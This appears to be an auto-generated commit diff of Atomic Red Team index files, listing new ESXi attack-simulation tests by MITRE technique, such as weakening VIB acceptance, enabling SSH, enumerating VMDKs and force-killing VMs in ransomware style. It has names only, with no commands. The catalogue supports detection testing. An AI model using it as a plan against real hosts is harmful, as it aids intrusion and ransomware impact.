Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -359,6 +359,8 @@ defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remov
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
 defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
 defense-evasion,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
+defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
+defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,2,ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI,14d55b96-b2f5-428d-8fed-49dc4d9dd616,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -453,6 +455,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,46,AWS - Guar
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper with Windows Defender Registry - Reg.exe,1f6743da-6ecc-4a93-b03f-dc357e4b313f,command_prompt
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
@@ -863,6 +866,7 @@ execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI
 execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
 execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,command_prompt
 execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
+execution,T1129,Server Software Component,1,ESXi - Install a custom VIB on an ESXi host,7f843046-abf2-443f-b880-07a83cf968ec,command_prompt
 execution,T1059.007,Command and Scripting Interpreter: JavaScript,1,JScript execution to gather local computer information via cscript,01d75adf-ca1b-4dd1-ac96-7c9550ad1035,command_prompt
 execution,T1059.007,Command and Scripting Interpreter: JavaScript,2,JScript execution to gather local computer information via wscript,0709945e-4fec-4c49-9faf-c3c292a74484,command_prompt
 execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
@@ -1311,6 +1315,7 @@ collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Adm
 collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
 collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 lateral-movement,T1021.005,Remote Services:VNC,1,Enable Apple Remote Desktop Agent,8a930abe-841c-4d4f-a877-72e9fe90b9ea,sh
+lateral-movement,T1021.004,Remote Services: SSH,1,ESXi - Enable SSH via PowerCLI,8f6c14d1-f13d-4616-b7fc-98cc69fe56ec,powershell
 lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
 lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
 lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
@@ -1652,6 +1657,8 @@ discovery,T1082,System Information Discovery,28,Driver Enumeration using DriverQ
 discovery,T1082,System Information Discovery,29,System Information Discovery,4060ee98-01ae-4c8e-8aad-af8300519cc7,command_prompt
 discovery,T1082,System Information Discovery,30,Check computer location,96be6002-9200-47db-94cb-c3e27de1cb36,command_prompt
 discovery,T1082,System Information Discovery,31,BIOS Information Discovery through Registry,f2f91612-d904-49d7-87c2-6c165d23bead,command_prompt
+discovery,T1082,System Information Discovery,32,ESXi - VM Discovery using ESXCLI,2040405c-eea6-4c1c-aef3-c2acc430fac9,command_prompt
+discovery,T1082,System Information Discovery,33,ESXi - Darkside system information discovery,f89812e5-67d1-4f49-86fa-cbc6609ea86a,command_prompt
 discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
 discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
@@ -1686,6 +1693,7 @@ discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1083,File and Directory Discovery,6,Launch DirLister Executable,c5bec457-43c9-4a18-9a24-fe151d8971b7,powershell
+discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available on an ESXi Host,4a233a40-caf7-4cf1-890a-c6331bbc72cf,command_prompt
 discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt
 discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
@@ -1828,6 +1836,8 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
 impact,T1529,System Shutdown/Reboot,12,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
+impact,T1529,System Shutdown/Reboot,13,ESXi - Terminates VMs using pkill,987c9b4d-a637-42db-b1cb-e9e242c3991b,command_prompt
+impact,T1529,System Shutdown/Reboot,14,ESXi - Avoslocker enumerates VMs and forcefully kills VMs,189f7d6e-9442-4160-9bc3-5e4104d93ece,command_prompt
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
 initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -95,6 +95,8 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Auditing Configu
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Logging Configuration Changes on FreeBSD Host,6b8ca3ab-5980-4321-80c3-bcd77c8daed8,sh
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
+defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,1,ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI,062f92c9-28b1-4391-a5f8-9d8ca6852091,powershell
+defense-evasion,T1562.010,Impair Defenses: Downgrade Attack,2,ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI,14d55b96-b2f5-428d-8fed-49dc4d9dd616,command_prompt
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Disable history collection (freebsd),cada55b4-8251-4c60-819e-8ec1b33c9306,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
@@ -116,6 +118,7 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Reboot Lin
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,47,Tamper with Defender ATP on Linux/MacOS,40074085-dbc8-492b-90a3-11bcfc52fda8,sh
+defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,50,ESXi - Disable Account Lockout Policy via PowerCLI,091a6290-cd29-41cb-81ea-b12f133c66cb,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as FreeBSD or Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
 defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
@@ -218,6 +221,7 @@ collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing d
 collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
 collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
+lateral-movement,T1021.004,Remote Services: SSH,1,ESXi - Enable SSH via PowerCLI,8f6c14d1-f13d-4616-b7fc-98cc69fe56ec,powershell
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
 privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
@@ -343,11 +347,14 @@ discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-
 discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
 discovery,T1082,System Information Discovery,25,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
 discovery,T1082,System Information Discovery,26,FreeBSD List Kernel Modules,4947897f-643a-4b75-b3f5-bed6885749f6,sh
+discovery,T1082,System Information Discovery,32,ESXi - VM Discovery using ESXCLI,2040405c-eea6-4c1c-aef3-c2acc430fac9,command_prompt
+discovery,T1082,System Information Discovery,33,ESXi - Darkside system information discovery,f89812e5-67d1-4f49-86fa-cbc6609ea86a,command_prompt
 discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
 discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON Files on FreeBSD,88ca025b-3040-44eb-9168-bd8af22b82fa,sh
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
 discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
+discovery,T1083,File and Directory Discovery,7,ESXi - Enumerate VMDKs available on an ESXi Host,4a233a40-caf7-4cf1-890a-c6331bbc72cf,command_prompt
 discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
@@ -411,6 +418,8 @@ impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-
 impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
+impact,T1529,System Shutdown/Reboot,13,ESXi - Terminates VMs using pkill,987c9b4d-a637-42db-b1cb-e9e242c3991b,command_prompt
+impact,T1529,System Shutdown/Reboot,14,ESXi - Avoslocker enumerates VMs and forcefully kills VMs,189f7d6e-9442-4160-9bc3-5e4104d93ece,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -578,6 +578,7 @@ execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI
 execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
 execution,T1047,Windows Management Instrumentation,9,WMI Execute rundll32,00738d2a-4651-4d76-adf2-c43a41dfb243,command_prompt
 execution,T1047,Windows Management Instrumentation,10,Application uninstall using WMIC,c510d25b-1667-467d-8331-a56d3e9bc4ff,command_prompt
+execution,T1129,Server Software Component,1,ESXi - Install a custom VIB on an ESXi host,7f843046-abf2-443f-b880-07a83cf968ec,command_prompt
 execution,T1059.007,Command and Scripting Interpreter: JavaScript,1,JScript execution to gather local computer information via cscript,01d75adf-ca1b-4dd1-ac96-7c9550ad1035,command_prompt
 execution,T1059.007,Command and Scripting Interpreter: JavaScript,2,JScript execution to gather local computer information via wscript,0709945e-4fec-4c49-9faf-c3c292a74484,command_prompt
 execution,T1559.002,Inter-Process Communication: Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual

atomics/Indexes/Indexes-Markdown/index.md

@@ -459,7 +459,9 @@
 - [T1055.002 Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md)
   - Atomic Test #1: Portable Executable Injection [windows]
 - T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.010 Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md)
+  - Atomic Test #1: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI [linux]
+  - Atomic Test #2: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI [linux]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -573,6 +575,7 @@
   - Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
   - Atomic Test #48: Tamper with Windows Defender Registry - Reg.exe [windows]
   - Atomic Test #49: Tamper with Windows Defender Registry - Powershell [windows]
+  - Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI [linux]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1165,7 +1168,8 @@
   - Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
   - Atomic Test #9: WMI Execute rundll32 [windows]
   - Atomic Test #10: Application uninstall using WMIC [windows]
-- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1129 Server Software Component](../../T1129/T1129.md)
+  - Atomic Test #1: ESXi - Install a custom VIB on an ESXi host [windows]
 - [T1059.007 Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md)
   - Atomic Test #1: JScript execution to gather local computer information via cscript [windows]
   - Atomic Test #2: JScript execution to gather local computer information via wscript [windows]
@@ -1849,7 +1853,8 @@
 - [T1021.005 Remote Services:VNC](../../T1021.005/T1021.005.md)
   - Atomic Test #1: Enable Apple Remote Desktop Agent [macos]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1021.004 Remote Services: SSH](../../T1021.004/T1021.004.md)
+  - Atomic Test #1: ESXi - Enable SSH via PowerCLI [linux]
 - [T1091 Replication Through Removable Media](../../T1091/T1091.md)
   - Atomic Test #1: USB Malware Spread Simulation [windows]
 - T1021.008 Direct Cloud VM Connections [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2295,6 +2300,8 @@
   - Atomic Test #29: System Information Discovery [windows]
   - Atomic Test #30: Check computer location [windows]
   - Atomic Test #31: BIOS Information Discovery through Registry [windows]
+  - Atomic Test #32: ESXi - VM Discovery using ESXCLI [linux]
+  - Atomic Test #33: ESXi - Darkside system information discovery [linux]
 - T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1010 Application Window Discovery](../../T1010/T1010.md)
   - Atomic Test #1: List Process Main Windows - C# .NET [windows]
@@ -2339,6 +2346,7 @@
   - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
   - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
   - Atomic Test #6: Launch DirLister Executable [windows]
+  - Atomic Test #7: ESXi - Enumerate VMDKs available on an ESXi Host [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
   - Atomic Test #1: System Network Connections Discovery [windows]
   - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
@@ -2623,6 +2631,8 @@
   - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
   - Atomic Test #11: Reboot System via `poweroff` - Linux [linux]
   - Atomic Test #12: Logoff System - Windows [windows]
+  - Atomic Test #13: ESXi - Terminates VMs using pkill [linux]
+  - Atomic Test #14: ESXi - Avoslocker enumerates VMs and forcefully kills VMs [linux]
 
 # initial-access
 - [T1133 External Remote Services](../../T1133/T1133.md)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -139,7 +139,9 @@
 - [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
   - Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1562.010 Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md)
+  - Atomic Test #1: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI [linux]
+  - Atomic Test #2: ESXi - Change VIB acceptance level to CommunitySupported via ESXCLI [linux]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -169,6 +171,7 @@
   - Atomic Test #42: Clear Pagging Cache [linux]
   - Atomic Test #43: Disable Memory Swap [linux]
   - Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
+  - Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI [linux]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -421,7 +424,8 @@
 # lateral-movement
 - T1021.005 Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1021.004 Remote Services: SSH](../../T1021.004/T1021.004.md)
+  - Atomic Test #1: ESXi - Enable SSH via PowerCLI [linux]
 - T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -641,6 +645,8 @@
   - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
   - Atomic Test #25: Linux List Kernel Modules [linux]
   - Atomic Test #26: FreeBSD List Kernel Modules [linux]
+  - Atomic Test #32: ESXi - VM Discovery using ESXCLI [linux]
+  - Atomic Test #33: ESXi - Darkside system information discovery [linux]
 - T1016.002 Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -653,6 +659,7 @@
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
   - Atomic Test #3: Nix File and Directory Discovery [linux, macos]
   - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos]
+  - Atomic Test #7: ESXi - Enumerate VMDKs available on an ESXi Host [linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
   - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -691,7 +698,7 @@
 - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # execution
-- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
@@ -779,6 +786,8 @@
   - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux]
   - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
   - Atomic Test #11: Reboot System via `poweroff` - Linux [linux]
+  - Atomic Test #13: ESXi - Terminates VMs using pkill [linux]
+  - Atomic Test #14: ESXi - Avoslocker enumerates VMs and forcefully kills VMs [linux]
 
 # initial-access
 - T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -101,7 +101,7 @@
 - [T1647 Plist File Modification](../../T1647/T1647.md)
   - Atomic Test #1: Plist Modification [macos]
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -352,7 +352,7 @@
 - [T1021.005 Remote Services:VNC](../../T1021.005/T1021.005.md)
   - Atomic Test #1: Enable Apple Remote Desktop Agent [macos]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.004 Remote Services: SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -559,7 +559,7 @@
 - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # execution
-- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1129 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -318,7 +318,7 @@
